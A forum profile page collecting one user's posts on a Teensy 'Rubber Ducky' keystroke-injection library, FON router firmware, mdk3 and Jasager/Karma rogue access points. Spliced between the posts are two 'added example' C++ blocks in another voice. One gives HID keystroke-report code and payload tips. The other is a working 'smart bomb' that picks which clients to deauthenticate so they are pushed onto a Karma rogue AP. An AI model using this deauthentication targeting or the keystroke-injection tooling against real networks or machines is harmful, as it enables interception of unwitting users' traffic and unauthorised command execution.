NFG

Active Members
Posts: 26

Everything posted by NFG

  1. I started playing with my Teensy in the Arduino software a couple of days ago and realized that the Arduino software is just a bunch of cpp code in libraries, cores, and examples files. This gave me an idea. Why don't we try to make a set of standard libraries for the Rubber Ducky? This would help everyone stop reinventing the same code for every project. Does this sound like a good idea? To help show how easy this is, I've posted my conversion of haxwithaxe/Irongeek's sample code. Just make the files listed below under the (Arduino folder)\libraries\RubberDucky and (Arduino folder)\libraries\RubberDucky\examples folders. Then when you open the Arduino software there is a RubberDucky option in the examples menu.

(Arduino folder)\libraries\RubberDucky\KeyPress.h

/*
  KeyPress.h - Library for sending a single key press.
  Created by NFG, 5 7, 2010.
  Released into the public domain.
*/
#ifndef KeyPress_h
#define KeyPress_h

// Teensyduino core: the Keyboard object plus the KEY_* and MODIFIERKEY_* definitions.
// Arduino 1.0 renamed WProgram.h to Arduino.h, so pick whichever the IDE provides.
#if defined(ARDUINO) && ARDUINO >= 100
#include "Arduino.h"
#else
#include "WProgram.h"
#endif

// Press and release one key.
void KeyPress(int _SomeKey);
// Press and release one key while holding one or more modifier keys.
void KeyCombo(int _ModKey, int _SomeKey);

#endif

(Arduino folder)\libraries\RubberDucky\KeyPress.cpp

/*
  KeyPress.cpp - Library for sending a single key press.
  Created by NFG, 5 7, 2010.
  Released into the public domain.
*/
#include "KeyPress.h"

void KeyPress(int _SomeKey)
{
  Keyboard.set_key1(_SomeKey); // set some key
  Keyboard.send_now();         // "press" some key
  // clear some key
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void KeyCombo(int _ModKey, int _SomeKey)
{
  Keyboard.set_modifier(_ModKey); // set one or more modifier keys
  Keyboard.set_key1(_SomeKey);    // set regular key
  Keyboard.send_now();            // send strokes
  // clear keys
  Keyboard.set_modifier(0);       // prep release of control keys
  Keyboard.set_key1(0);           // have to do this to keep it from hitting key multiple times
  Keyboard.send_now();
}

(Arduino folder)\libraries\RubberDucky\Windows.h

/*
  Windows.h - Library for common Windows keyboard shortcuts.
  Created by NFG, 5 7, 2010.
  Released into the public domain.
*/
#ifndef Windows_h
#define Windows_h

#include "KeyPress.h"

namespace Windows
{
  void Command(const char *_SomeCommand); // run a command through the Run dialog
  void Help(void);     // F1
  void Start(void);    // Win
  void Switch(void);   // Alt+Tab
  void Quit(void);     // Alt+F4
  void Lock(void);     // Win+L
  void MinAll(void);   // Win+M
  void Explorer(void); // Win+E
  void Copy(void);     // Ctrl+C
  void Cut(void);      // Ctrl+X
  void Paste(void);    // Ctrl+V
  void SelAll(void);   // Ctrl+A
}

#endif

(Arduino folder)\libraries\RubberDucky\Windows.cpp

/*
  Windows.cpp - Library for common Windows keyboard shortcuts.
  Created by NFG, 5 7, 2010.
  Released into the public domain.
*/
#include "Windows.h"
#include "KeyPress.h"

namespace Windows
{
  void Command(const char *_SomeCommand)
  {
    KeyCombo(MODIFIERKEY_GUI, KEY_R); // open Run dialog
    delay(1500);                      // wait for it to open
    Keyboard.print(_SomeCommand);     // enter some command
    KeyPress(KEY_ENTER);              // exec some command
  }

  void Help(void)     { KeyPress(KEY_F1); }                   // display Help
  void Start(void)    { KeyCombo(MODIFIERKEY_GUI, 0); }       // display Start menu
  void Switch(void)   { KeyCombo(MODIFIERKEY_ALT, KEY_TAB); } // switch window
  void Quit(void)     { KeyCombo(MODIFIERKEY_ALT, KEY_F4); }  // close active window
  void Lock(void)     { KeyCombo(MODIFIERKEY_GUI, KEY_L); }   // lock workstation
  void MinAll(void)   { KeyCombo(MODIFIERKEY_GUI, KEY_M); }   // minimize all windows
  void Explorer(void) { KeyCombo(MODIFIERKEY_GUI, KEY_E); }   // open Explorer
  void Copy(void)     { KeyCombo(MODIFIERKEY_CTRL, KEY_C); }  // copy
  void Cut(void)      { KeyCombo(MODIFIERKEY_CTRL, KEY_X); }  // cut
  void Paste(void)    { KeyCombo(MODIFIERKEY_CTRL, KEY_V); }  // paste
  void SelAll(void)   { KeyCombo(MODIFIERKEY_CTRL, KEY_A); }  // select all
}

(Arduino folder)\libraries\RubberDucky\keywords.txt

#######################################
# Syntax Coloring Map For RubberDucky
#######################################

#######################################
# Datatypes (KEYWORD1)
#######################################

Windows	KEYWORD1

#######################################
# Methods and Functions (KEYWORD2)
#######################################

KeyPress	KEYWORD2
KeyCombo	KEYWORD2
Command	KEYWORD2
Help	KEYWORD2
Start	KEYWORD2
Switch	KEYWORD2
Quit	KEYWORD2
Lock	KEYWORD2
MinAll	KEYWORD2
Explorer	KEYWORD2
Copy	KEYWORD2
Cut	KEYWORD2
Paste	KEYWORD2
SelAll	KEYWORD2

(Arduino folder)\libraries\RubberDucky\examples\Windows_example\Windows_example.pde

#include <KeyPress.h>
#include <Windows.h>

/*
  The following library is haxwithaxe and Omidenchin's (aka Omi) code to do simple
  keyboard functions with the Teensy, converted to a library format.

  NOTE: The original code is Irongeek's (with many additions and subtractions by
  haxwithaxe and Omidenchin (aka Omi)). haxwithaxe has removed the DIPSwitch code
  because he doesn't have a dipswitch to play with, but it can be just as easily
  put back in and used to select the payload.

  It is strongly recommended that you go to Irongeek's site and not only look at
  his code but watch the accompanying video right above the code example.
  Original Source: http://www.irongeek.com/i.php?page=securit...eystroke-dongle
  Also see his updated source with some of my stuff in it.

  To learn more about Teensyduino see: http://www.pjrc.com/teensy/teensyduino.html
  Look in arduino-xxxx\hardware\teensy\cores\teensy_hid\usb_api.h for key definitions.
  Edit arduino-xxxx\hardware\teensy\cores\teensy_hid\usb_private.h to change the
  USB Vendor and Product ID.

  To learn more about keyboard shortcuts:
    Apple:     http://support.apple.com/kb/ht1343
    Windows:   http://support.microsoft.com/kb/126449
    Gnome/KDE: http://www.novell.com/coolsolutions/tip/2289.html
  Please add more to this list if you can think of any window managers that have
  default keyboard shortcuts.
*/

int ledPin = 11; // LED connected to digital pin 11 for Teensy 2.0 and pin 6 for Teensy++ 2.0

// The setup() method runs once, when the sketch starts
void setup()
{
  // initialize the digital pin as an output:
  pinMode(ledPin, OUTPUT);
}

// the loop() method runs over and over again,
// as long as the Arduino has power
void loop()
{
  delay(1000);                // wait for host to listen
  digitalWrite(ledPin, HIGH); // set the LED on
  Windows::Command("notepad.exe");
  delay(1000);
  Keyboard.print("Rubber Ducky was here!!! }:)");
  delay(1000);
  Windows::SelAll();
  delay(1000);
  KeyPress(KEY_BACKSPACE);
  delay(1000);
  Windows::Quit();
  digitalWrite(ledPin, LOW);  // set the LED off
  delay(1500);                // keeps commands from being sent one after the other too fast
}
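As an added example (not part of NFG's library or any of the linked projects), the following host-side C++ models what the Teensy actually puts on the USB wire for KeyPress(), KeyCombo() and Windows::Command(): the 8-byte HID boot-protocol keyboard report that set_modifier()/set_key1()/send_now() assemble. The modifier bits and key usage IDs are taken from the USB HID Usage Tables, not copied from usb_api.h, and the character map assumes a US keyboard layout on the host, which is the same silent assumption a Ducky payload makes.

```cpp
// Added example, not NFG's RubberDucky code: a host-side model of the 8-byte
// USB HID boot-protocol keyboard report the Teensy sends.  Constants are from
// the USB HID Usage Tables (keyboard/keypad page 0x07), not from Teensyduino's
// usb_api.h, whose KEY_* macros may carry extra flag bits.
#include <array>
#include <cstdint>
#include <stdexcept>
#include <string>
#include <vector>

// Report layout: [modifier bitmask][reserved][key slot 1..6]
using Report = std::array<uint8_t, 8>;

constexpr uint8_t MOD_LCTRL  = 0x01;
constexpr uint8_t MOD_LSHIFT = 0x02;
constexpr uint8_t MOD_LALT   = 0x04;
constexpr uint8_t MOD_LGUI   = 0x08;   // left "Windows" key

constexpr uint8_t KEY_ENTER = 0x28;
constexpr uint8_t KEY_TAB   = 0x2B;
constexpr uint8_t KEY_F4    = 0x3D;    // F1 is 0x3A

// A usage ID plus the modifier it needs on a US layout.  The wire format has no
// notion of case or characters: 'N' is the 'n' key position with LSHIFT held.
struct Keystroke { uint8_t modifiers; uint8_t usage; };

Keystroke keystroke_for(char c) {
    if (c >= 'a' && c <= 'z') return {0, static_cast<uint8_t>(0x04 + (c - 'a'))};
    if (c >= 'A' && c <= 'Z') return {MOD_LSHIFT, static_cast<uint8_t>(0x04 + (c - 'A'))};
    if (c >= '1' && c <= '9') return {0, static_cast<uint8_t>(0x1E + (c - '1'))};
    switch (c) {
        case '0':  return {0, 0x27};
        case ' ':  return {0, 0x2C};
        case '-':  return {0, 0x2D};
        case '.':  return {0, 0x37};
        case '/':  return {0, 0x38};
        case '\\': return {0, 0x31};
        case ':':  return {MOD_LSHIFT, 0x33};   // shifted ';'
    }
    throw std::invalid_argument(std::string("no mapping for character: ") + c);
}

// One report: modifiers plus up to six simultaneously held keys (6-key rollover).
Report make_report(uint8_t modifiers, const std::vector<uint8_t>& keys) {
    if (keys.size() > 6) throw std::length_error("boot keyboard report holds at most 6 keys");
    Report r{};                       // zero-initialised; byte 1 is the reserved byte
    r[0] = modifiers;
    for (size_t i = 0; i < keys.size(); ++i) r[2 + i] = keys[i];
    return r;
}

// Equivalent of KeyCombo(mod, key): a "press" report followed by the all-zero
// "release" report.  Without the release the host believes the key is still
// held and starts typematic auto-repeat, the "hitting key multiple times"
// problem the library's comment refers to.
std::vector<Report> key_combo(uint8_t modifiers, uint8_t usage) {
    return { make_report(modifiers, {usage}), make_report(0, {}) };
}

std::vector<Report> key_press(uint8_t usage) { return key_combo(0, usage); }

// Equivalent of Windows::Command(cmd): Win+R, type the command, Enter.  Every
// character is its own press/release pair, as Keyboard.print() also does.
std::vector<Report> command_sequence(const std::string& cmd) {
    std::vector<Report> out = key_combo(MOD_LGUI, keystroke_for('r').usage);
    for (char c : cmd) {
        Keystroke k = keystroke_for(c);
        std::vector<Report> pair = key_combo(k.modifiers, k.usage);
        out.insert(out.end(), pair.begin(), pair.end());
    }
    std::vector<Report> enter = key_press(KEY_ENTER);
    out.insert(out.end(), enter.begin(), enter.end());
    return out;
}

// True when a report with more than six keys is refused (the 6KRO limit).
bool rejects_over_six_keys() {
    try { make_report(0, {1, 2, 3, 4, 5, 6, 7}); }
    catch (const std::length_error&) { return true; }
    return false;
}
```

Two things the model makes visible for payload writers. The second, all-zero report in key_combo() is not optional: the host keeps a key "down" until it sees the release and then auto-repeats it, which is why the original library clears both the modifier and the key slot before its final send_now(). And the device never sends characters, only key positions: Windows::Command("notepad.exe") on a host with a non-US layout can type different punctuation, so a payload should be tested on the target's OS and layout rather than assumed to work; the same goes for the fixed 1500 ms wait for the Run dialog, which a slow or busy machine can miss.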
  2. Have you thought about trying to build it for the FON2202 Caterpillar developers firmware?
  3. I don't have rights to upload the file, which is why I posted the makefile. This is what I did to build it: How To Build Packages. Just make sure you download the 7.09 version of the SDK.
  4. The autoap.sh found my AP and tried to connect but it didn't work. I think the script might need some minor tweaks but I think it's close. I'll try to play with it more when I get some time.

sed: /tmp/www/autoap.htm: No such file or directory
./autoap.sh: ./autoap.sh: 487: nvram: not found
./autoap.sh: ./autoap.sh: 487: gpio: not found
./autoap.sh: ./autoap.sh: 487: nvram: not found
sh: 1: unknown operand
Reading NVRAM variables...
./autoap.sh: ./autoap.sh: 492: nvram: not found
sh: ap: unknown operand
./autoap.sh: ./autoap.sh: 497: nvram: not found
sh: dhcp: unknown operand
Successfully collected access point scan data, analysing...
Status  Type  Name  MAC Address        Channel  SNR[dB]
Found   open  AP    xxxx 00:05:5D:EC:25:68  6   39
Trying to connect to open AP: "xxxx" with MAC Address: 00:00:00:00:00:00
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
cat: /tmp/var/run/udhcpc.pid: No such file or directory
ping: www.google.com: Unknown host
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=1.4 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=1.4 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=1.3 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=1.3 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=1.3 ms

--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 1.3/1.3/1.4 ms
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
ping: www.google.com: Unknown host
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
ping: www.google.com: Unknown host
./autoap.sh: ./autoap.sh: 524: gpio: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
ping: www.google.com: Unknown host
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
Failed to ping: "xxxx"
Gateway:
Received IP Address:
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
./autoap.sh: ./autoap.sh: 524: nvram: not found
  5. The autoap.exe didn't kill my Fon; the program just crashed because nvram.o was missing. I haven't tried all the scripts yet but I can when I get home.
  6. There should be a client or AP filter on mdk3. I seem to remember deauthing everything other than my laptop. However, I'm at work right now so I can't look at the command options. You are probably right about the serial cable. At the time I didn't have a serial cable connected to it, so the network settings probably got messed up and locked me out somehow. But it wasn't anything a quick reset didn't fix.
  7. When I tried doing that it locked up the Fon.
  8. Do you think the autoap.exe would work on OpenWrt? Everything else is shell script or an awk script. I haven't looked at the scripts too much yet, but I don't know why they couldn't be converted to OpenWrt.
  9. Yea, I've been looking into that too. treebuey on fonerahacks.com converted it to the DD-WRT version of the Fon. The main part of the program is a shell script that calls some custom programs or built-in DD-WRT commands. So if the programs would work on OpenWrt then the only thing that needs to be changed are the DD-WRT commands to OpenWrt versions.
  10. I think you might need aircrack-ng installed too. I guess I should have tested it better, but I was just so excited that I figured out how to get it to build correctly.
  11. As Orange said in his post about the new firmware. Also, it would be nice to have something that would work on all the different Fons.
  12. If you don't hear back from Orange, I do have the latest OpenWrt trunk with the mdk3 package set up. It runs the same as his, other than I have a newer build.
  13. That's why I asked how many devices everyone has.
  14. This is a follow up poll from Eviltechie's poll. This way if we know what people are trying to use.
  15. Yea but I had to try and see what would happen because if I didn't then everyone else would complain about it not working right.
  16. Just follow Rob's guide on the forums, Notes for Jasager on Fon+ 2201; it should get you up and running. However, before you start installing the stuff for Jasager, buy a cheap USB stick and set it up as the storage/swap space. The jump drive is faster than the Fon's internal flash, and if you mess something up you just format the USB drive, not the Fon.
  17. Yes, with tinkering but I have a Fon+ and a Fon v2 so it took a bit more.
  18. I figured out how the Piranha firmware built the mdk3 package today and I was able to compile my own package :D . mdk3 does kind of work alongside Karma but there are some minor issues. For example, when I tried setting up Jasager on channel 6 and set mdk3 to channel hop, it crashed my Fon+ after a minute or so <_< . However, it did run somewhat OK when both were set to the same channel. Unfortunately, I'm unable to upload the package to the forums. But I'll give everyone the makefile so that you can build it yourself, and maybe someone will be kind and upload the package for the people that don't know how to build it.

include $(TOPDIR)/rules.mk

PKG_NAME:=mdk3
PKG_REV:=5
PKG_VERSION:=v$(PKG_REV)
PKG_RELEASE:=1

PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.bz2
PKG_SOURCE_URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
PKG_SOURCE_SUBDIR:=$(PKG_NAME)-$(PKG_VERSION)
PKG_SOURCE_VERSION:=$(PKG_REV)
#PKG_SOURCE_PROTO:=svn

include $(INCLUDE_DIR)/package.mk

define Package/mdk3
  SECTION:=net
  CATEGORY:=Network
  TITLE:=MDK3
  URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
  SUBMENU:=wireless
endef

define Package/mdk3/description
  Tool to exploit wireless vulnerabilities
endef

define Build/Configure
endef

define Package/mdk3/install
	$(INSTALL_DIR) $(1)/usr/sbin
	$(CP) $(PKG_BUILD_DIR)/mdk3 $(1)/usr/sbin/
endef

$(eval $(call BuildPackage,mdk3))
  19. I know, I'm playing with the firmware that has mdk3 on it. I was just wondering if anyone had any ideas as to how to get a list of the clients. That way there would be a working script if and when Karma is added.
  20. Does anyone know of a way to get a list of clients that are associated with other APs? Kismet makes a list, but you need to exit Kismet to update the list, and I don't know if you can output the list in airodump-ng. I was trying to make a smart bomb that would let you select one or all of the clients that you want to deauthenticate. That way you would only attack known clients, and it would stop the attack when the clients joined the Karma AP. I was hoping that by doing it this way you could run Karma and the deauthentication attack at the same time. It would also allow you to see if there are any targets in the area and maybe allow you to detect a Karma AP too.
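The selection logic described in the two posts above, as an added example that is not code from NFG, Jasager or any of the firmwares discussed: it reads the CSV that airodump-ng writes when run with -w <prefix> (the file is <prefix>-01.csv), takes the station table from it, and produces the "smart bomb" target set: every client currently associated with some other AP, minus the MACs you want left alone (your own laptop), minus anyone who has already moved to the Karma AP's BSSID. The CSV text at the bottom is a constructed sample in airodump-ng's layout, not a real capture, and the column layout it assumes is airodump-ng's CSV output.

```cpp
// Added example, not from NFG or any project on this page: turn an airodump-ng
// CSV into a deauth target list that excludes a whitelist and anyone already
// on the Karma AP.  SAMPLE_CSV is constructed test data in airodump-ng's layout.
#include <cstddef>
#include <set>
#include <sstream>
#include <string>
#include <vector>

struct Client {
    std::string mac;
    std::string bssid;      // "(not associated)" when the station is only probing
    std::string probes;     // ESSIDs the station has probed for
};

static std::string trim(const std::string& s) {
    const char* ws = " \t\r\n";
    size_t b = s.find_first_not_of(ws), e = s.find_last_not_of(ws);
    return b == std::string::npos ? "" : s.substr(b, e - b + 1);
}

static std::vector<std::string> split_csv(const std::string& line) {
    std::vector<std::string> f;
    std::string cur;
    std::istringstream in(line);
    while (std::getline(in, cur, ',')) f.push_back(trim(cur));
    return f;
}

// The file holds two tables: access points first, then a blank line and a table
// whose header begins "Station MAC".  Only the second table is needed here.
std::vector<Client> parse_stations(const std::string& csv) {
    std::vector<Client> out;
    std::istringstream in(csv);
    std::string line;
    bool in_stations = false;
    while (std::getline(in, line)) {
        std::string t = trim(line);
        if (t.rfind("Station MAC", 0) == 0) { in_stations = true; continue; }
        if (!in_stations || t.empty()) continue;
        std::vector<std::string> f = split_csv(t);
        if (f.size() < 6) continue;     // malformed or truncated row
        // Probed ESSIDs are themselves comma separated; re-join everything after column 5.
        std::string probes;
        for (size_t i = 6; i < f.size(); ++i) probes += (i > 6 ? "," : "") + f[i];
        out.push_back({f[0], f[5], probes});
    }
    return out;
}

// Targets = associated stations, minus the whitelist, minus anything already
// sitting on the Karma AP's BSSID (the "stop when they join" condition).
std::set<std::string> deauth_targets(const std::vector<Client>& clients,
                                     const std::set<std::string>& whitelist,
                                     const std::string& karma_bssid) {
    std::set<std::string> targets;
    for (const Client& c : clients) {
        if (c.bssid == "(not associated)") continue;   // nothing to kick them off
        if (c.bssid == karma_bssid) continue;          // already ours
        if (whitelist.count(c.mac)) continue;          // e.g. your own laptop
        targets.insert(c.mac);
    }
    return targets;
}

// Constructed sample in airodump-ng's CSV layout (AP table abbreviated).
const std::string SAMPLE_CSV =
    "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\r\n"
    "00:11:22:33:44:55, 2010-01-01 10:00:00, 2010-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   6, office, \r\n"
    "AA:BB:CC:DD:EE:FF, 2010-01-01 10:00:00, 2010-01-01 10:05:00,  6,  54, OPN ,     ,    , -30,  200,  0,   0.  0.  0.  0,   5, karma, \r\n"
    "\r\n"
    "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\r\n"
    "DE:AD:BE:EF:00:01, 2010-01-01 10:00:00, 2010-01-01 10:05:00, -50,   40, 00:11:22:33:44:55, office\r\n"
    "DE:AD:BE:EF:00:02, 2010-01-01 10:00:00, 2010-01-01 10:05:00, -55,   12, 00:11:22:33:44:55, office,home\r\n"
    "DE:AD:BE:EF:00:03, 2010-01-01 10:01:00, 2010-01-01 10:05:00, -60,    3, (not associated), linksys,Free WiFi\r\n"
    "DE:AD:BE:EF:00:04, 2010-01-01 10:02:00, 2010-01-01 10:05:00, -45,   90, AA:BB:CC:DD:EE:FF, home\r\n"
    "CA:FE:CA:FE:00:01, 2010-01-01 10:00:00, 2010-01-01 10:05:00, -20,  500, 00:11:22:33:44:55, office\r\n";

// Run it on the sample: CA:FE:... is the whitelisted laptop, AA:BB:... is the Karma AP.
std::set<std::string> sample_targets() {
    return deauth_targets(parse_stations(SAMPLE_CSV),
                          {"CA:FE:CA:FE:00:01"}, "AA:BB:CC:DD:EE:FF");
}
```

The same logic fits in a few lines of awk on the Fon; C++ is used here only to match the rest of the page. Written one MAC per line, the resulting set is the blacklist file that mdk3's deauth mode takes (the -b option on the mdk3 builds I have used; check your build's help output), and re-running the parser on the next CSV snapshot is what makes the attack stop for a client once its BSSID column changes to the Karma AP. Note that the station table only shows what the card has seen on the channel it is currently on, so the list is only as complete as the channel you are watching.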
  21. You don't need to downgrade anything. The FON2 is still in beta so they didn't lock anything down; at least mine wasn't. I just ran the Freifunk AP51 GUI and selected the firmware. It's the same hardware as the FON+ with the addition of a USB chip, so just follow the guide for the FON+ and it should work. That's what I did.
  22. Cool if there is anything I can do to help let me know.
  23. How hard would it be to add the Karma patches to the Piranha firmware? He already has mdk3 and aircrack-ng working on the Fon. I haven't had a chance to test this firmware yet on my FON2 but I probably will over Christmas. It would probably work better than using the Gargoyle firmware that is currently needed for the Fon+ or the Fon2.